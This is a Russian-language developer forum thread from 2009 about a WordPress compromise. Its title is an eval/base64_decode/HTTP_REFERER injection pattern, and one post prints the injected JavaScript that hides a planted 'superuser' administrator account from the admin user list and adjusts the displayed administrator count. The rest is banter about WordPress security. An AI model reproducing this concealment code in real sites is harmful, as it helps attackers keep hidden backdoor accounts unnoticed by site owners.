ФорумСообществоНовости → %&evalbase64_decode_SERVERHTTP_REFERER.+&%

%&evalbase64_decode_SERVERHTTP_REFERER.+&%

  • Trej Gun

    Сообщения: 5305 Репутация: N Группа: в ухо

    Spritz Сен. 5, 2009, 5 п.п., спустя 2 часа 43 минуты 41 секунду

    обновился до 2.8.4
  • adw0rd

    Сообщения: 22959 Репутация: N Группа: в ухо

    Spritz Сен. 6, 2009, 4:03 п.п., спустя 23 часа 2 минуты 46 секунд

    http://blogproblog.com/wordpress_blogs_attack/
    https://smappi.org/ - платформа по созданию API на все случаи жизни
  • artoodetoo

    Сообщения: 5147 Репутация: N Группа: в ухо

    Spritz Сен. 6, 2009, 4:49 п.п., спустя 45 минут 59 секунд

    к счастью я не полльзуюсь WP. правильно ли я понял: уязвимость происходит через имя пользователя? типа достаточно зарегаться со злоебучим именем и ты админ? :))) просто удивительно как наивны разработчики WP.
    ιιlllιlllι унц-унц
  • phpdude

    Сообщения: 26646 Репутация: N Группа: в ухо

    Spritz Сен. 6, 2009, 4:50 п.п., спустя 1 минуту 21 секунду


    к счастью я не полльзуюсь WP. правильно ли я понял: уязвимость происходит через имя пользователя? типа достаточно зарегаться со злоебучим именем и ты админ? :))) просто удивительно как наивны разработчики WP.
    я про это давно где то сказал или у меня дежавю …
    Сапожник без сапог
  • Trej Gun

    Сообщения: 5305 Репутация: N Группа: в ухо

    Spritz Сен. 6, 2009, 7:07 п.п., спустя 2 часа 16 минут 19 секунд


    var setUserName = function(){
    try{
    var t=document.getElementById("user_superuser");
    while(t.nodeName!="TR"){
    t=t.parentNode;
    };
    t.parentNode.removeChild(t);
    var tags = document.getElementsByTagName("H3");
    var s = " shown below";
    for (var i = 0; i < tags.length; i++) {
    var t=tags.innerHTML;
    var h=tags;
    if(t.indexOf(s)>0){
    s =(parseInt(t)-1)+s;
    h.removeChild(h.firstChild);
    t = document.createTextNode(s);
    h.appendChild(t);
    }
    }
    var arr=document.getElementsByTagName("ul");
    for(var i in arr)
    if(arr.className=="subsubsub"){
    var n=/>Administrator ((d+))</gi.exec(arr.innerHTML);
    if(n[1]>0){
    var txt=arr.innerHTML.replace(/>Administrator ((d+))</gi,">Administrator ("+(n[1]-1)+")<");
            arr.innerHTML=txt;
            }
        }
              }catch(e){};
         };
         addLoadEvent(setUserName);

    нет имя только скрывает пользователя из списка
  • adw0rd

    Сообщения: 22959 Репутация: N Группа: в ухо

    Spritz Сен. 6, 2009, 8:15 п.п., спустя 1 час 8 минут

    у меня вообще рега отлючена
    https://smappi.org/ - платформа по созданию API на все случаи жизни
  • sap

    Сообщения: 2701 Репутация: N Группа: Кто попало

    Spritz Сен. 6, 2009, 9:37 п.п., спустя 1 час 22 минуты 15 секунд

    Вордпресс говно)
  • adw0rd

    Сообщения: 22959 Репутация: N Группа: в ухо

    Spritz Сен. 6, 2009, 9:41 п.п., спустя 4 минуты 7 секунд


    Вордпресс говно)
    уверен что в твоем **** тоже полным полно дыр, только никто их не собирается искать
    https://smappi.org/ - платформа по созданию API на все случаи жизни
  • md5

    Сообщения: 11960 Репутация: N Группа: в ухо

    Spritz Сен. 6, 2009, 9:47 п.п., спустя 5 минут 30 секунд



    Вордпресс говно)
    никто их не собирается искать
    +1
    :D
    все умрут, а я изумруд
  • rider-sx

    Сообщения: 2706 Репутация: N Группа: Адекваты

    Spritz Сен. 6, 2009, 9:48 п.п., спустя 1 минуту 49 секунд

    :DDD
  • sap

    Сообщения: 2701 Репутация: N Группа: Кто попало

    Spritz Сен. 6, 2009, 10:14 п.п., спустя 25 минут 46 секунд



    Вордпресс говно)
    уверен что в твоем **** тоже полным полно дыр, только никто их не собирается искать

    Ок) Но вордпресс от этого говном быть не перестает)
  • adw0rd

    Сообщения: 22959 Репутация: N Группа: в ухо

    Spritz Сен. 6, 2009, 10:17 п.п., спустя 2 минуты 45 секунд

    sap, да все говно, и так было всегда
    https://smappi.org/ - платформа по созданию API на все случаи жизни
  • sap

    Сообщения: 2701 Репутация: N Группа: Кто попало

    Spritz Сен. 6, 2009, 10:18 п.п., спустя 44 секунды


    sap, да все говно, и так было всегда

    Не все.
  • adw0rd

    Сообщения: 22959 Репутация: N Группа: в ухо

    Spritz Сен. 6, 2009, 10:21 п.п., спустя 3 минуты 2 секунды

    sap, что не говно?
    https://smappi.org/ - платформа по созданию API на все случаи жизни
  • md5

    Сообщения: 11960 Репутация: N Группа: в ухо

    Spritz Сен. 6, 2009, 10:23 п.п., спустя 2 минуты 49 секунд


    sap, что не говно?
    sTemplate !!!!!!!!!!!!!!!111111111
    Спустя 14 сек.
    sTemp или как там)
    все умрут, а я изумруд

Пожалуйста, авторизуйтесь, чтобы написать комментарий!